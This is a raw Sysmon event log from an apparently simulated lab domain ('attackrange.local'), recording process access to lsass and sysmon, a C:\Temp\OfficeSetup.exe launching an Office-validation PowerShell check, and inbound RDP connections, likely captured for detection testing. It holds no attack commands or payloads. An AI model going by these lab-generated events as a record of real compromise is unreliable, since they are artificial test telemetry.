14:53:32.550{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062983Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:32.550{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062982Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:32.550{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062981Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:32.550{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062980Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:32.550{A7A01FEF-C0A3-607E-6C05-00000000BB01}36241208C:\Windows\system32\csrss.exe{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000062979Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:32.550{A7A01FEF-C0A6-607E-8105-00000000BB01}836108C:\Windows\Explorer.EXE{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e69f|C:\Windows\System32\windows.storage.dll+16e315|C:\Windows\System32\windows.storage.dll+16de06|C:\Windows\System32\windows.storage.dll+16f278|C:\Windows\System32\windows.storage.dll+16dc2e|C:\Windows\System32\windows.storage.dll+fd025|C:\Windows\System32\windows.storage.dll+fd3a4|C:\Windows\System32\windows.storage.dll+fc9e0|C:\Windows\System32\windows.storage.dll+16650e|C:\Windows\System32\windows.storage.dll+166202|C:\Windows\System32\SHELL32.dll+3f8cd|C:\Windows\System32\SHELL32.dll+3e466|C:\Windows\System32\SHELL32.dll+80201|C:\Windows\System32\SHELL32.dll+6718e|C:\Windows\System32\SHELL32.dll+18d18c|C:\Windows\System32\SHELL32.dll+18cee3|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000062978Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:32.498{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe16.0.13801.20266Microsoft OfficeMicrosoft OfficeMicrosoft CorporationBootstrapper.exe"C:\Temp\OfficeSetup.exe" C:\Temp\ATTACKRANGE\Administrator{A7A01FEF-C0A5-607E-58C6-320000000000}0x32c6582HighMD5=1B649814B0DBE3798D7426035C957FBD,SHA256=6469E1E2B57624EF62F5D36DFF93DFA0A50357B38350B565F395954A69327BB3,IMPHASH=6C556F7C64982E938EFD4571794DFE48{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x800000000000000062977Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:32.113{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=652630B9571023FB8376C1FC827FCEC6,SHA256=E6970BB0C8AB68A96CBF5B47B64D2E99B10F01053F85BC535F4CC272B6309B47,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049269Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:30.553{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50425-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049268Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:29.848{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52472-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000049273Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:33.708{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB0F87CCE112CBFCDD658F37C4AD86EF,SHA256=9881012120BB54217F73A583CC4D1D004D437D0DB62038F03FAAB6DD5BB036D2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049272Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:30.625{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53379-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000063029Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.707{A7A01FEF-B626-607E-1600-00000000BB01}15402060C:\Windows\system32\svchost.exe{A7A01FEF-EAED-607E-680B-00000000BB01}5296C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063028Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.707{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EAED-607E-680B-00000000BB01}5296C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063027Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.691{A7A01FEF-EAED-607E-680B-00000000BB01}52966772C:\Windows\system32\conhost.exe{A7A01FEF-EAED-607E-670B-00000000BB01}3712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063026Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.675{A7A01FEF-C0A3-607E-6C05-00000000BB01}36241208C:\Windows\system32\csrss.exe{A7A01FEF-EAED-607E-680B-00000000BB01}5296C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000063025Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.675{A7A01FEF-B626-607E-1300-00000000BB01}12644440C:\Windows\System32\svchost.exe{A7A01FEF-EAED-607E-680B-00000000BB01}5296C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063024Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.628{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063023Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.628{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063022Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.628{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063021Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.628{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063020Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.628{A7A01FEF-C0A3-607E-6C05-00000000BB01}36244292C:\Windows\system32\csrss.exe{A7A01FEF-EAED-607E-670B-00000000BB01}3712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000063019Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.628{A7A01FEF-EAEC-607E-660B-00000000BB01}68406800C:\Temp\OfficeSetup.exe{A7A01FEF-EAED-607E-670B-00000000BB01}3712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\System32\windows.storage.dll+124156(wow64)|C:\Windows\System32\windows.storage.dll+123e11(wow64)|C:\Windows\System32\windows.storage.dll+123ee3(wow64)|C:\Windows\System32\windows.storage.dll+124bb5(wow64)|C:\Windows\System32\windows.storage.dll+123a61(wow64)|C:\Windows\System32\windows.storage.dll+125db0(wow64)|C:\Windows\System32\windows.storage.dll+12602c(wow64)|C:\Windows\System32\windows.storage.dll+125915(wow64)|C:\Windows\System32\SHELL32.dll+1a8264(wow64)|C:\Windows\System32\SHELL32.dll+1a813e(wow64)|C:\Windows\System32\SHELL32.dll+1a7f39(wow64) 154100x800000000000000063018Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.627{A7A01FEF-EAED-607E-670B-00000000BB01}3712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile "$package = Get-AppxPackage Microsoft.Office.Desktop -allUsers; if (!$package) { $Error.Add(\"Package is not installed\")}; if ($error.Count -eq 0) { Out-File -FilePath 'C:\Users\ADMINI~1\AppData\Local\Temp\Office.ValidateResult.scratch' -InputObject '1' -Encoding ascii; } else { Out-File -FilePath 'C:\Users\ADMINI~1\AppData\Local\Temp\Office.ValidateResult.scratch' -InputObject '0' -Encoding ascii; Out-File -FilePath 'C:\Users\ADMINI~1\AppData\Local\Temp\Office.ValidateError.scratch' -InputObject $error -Encoding ascii;} "C:\Temp\ATTACKRANGE\Administrator{A7A01FEF-C0A5-607E-58C6-320000000000}0x32c6582HighMD5=65D86C34814C02569E2AD53FD24E7F61,SHA256=8133502266008B77DE7921451E1210B0EF3F0ED2DB7D8D3EE0C3350D856FA6FA,IMPHASH=5E0145CEF36FA9BFBA7DE33AA683B8ED{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe"C:\Temp\OfficeSetup.exe" 10341000x800000000000000063017Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.613{A7A01FEF-B626-607E-1300-00000000BB01}12644440C:\Windows\System32\svchost.exe{A7A01FEF-EAED-607E-670B-00000000BB01}3712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000063016Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.566{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=15D24D6FA665F6FE6218ED8D3E01B8C5,SHA256=725E9ED5CFDA9C234C8C2E4462A3017334C53A35FA7549C36137943D821033EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063015Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.566{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7ED61960DD65A0AB02EA5433062597B8,SHA256=BB1828510EA110A758A4D94DA8C66434B14E659843D22A331FD337CF0D659C22,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063014Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.550{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063013Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.550{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063012Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.550{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063011Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.503{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063010Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.472{A7A01FEF-C0A6-607E-8105-00000000BB01}8362304C:\Windows\Explorer.EXE{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063009Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 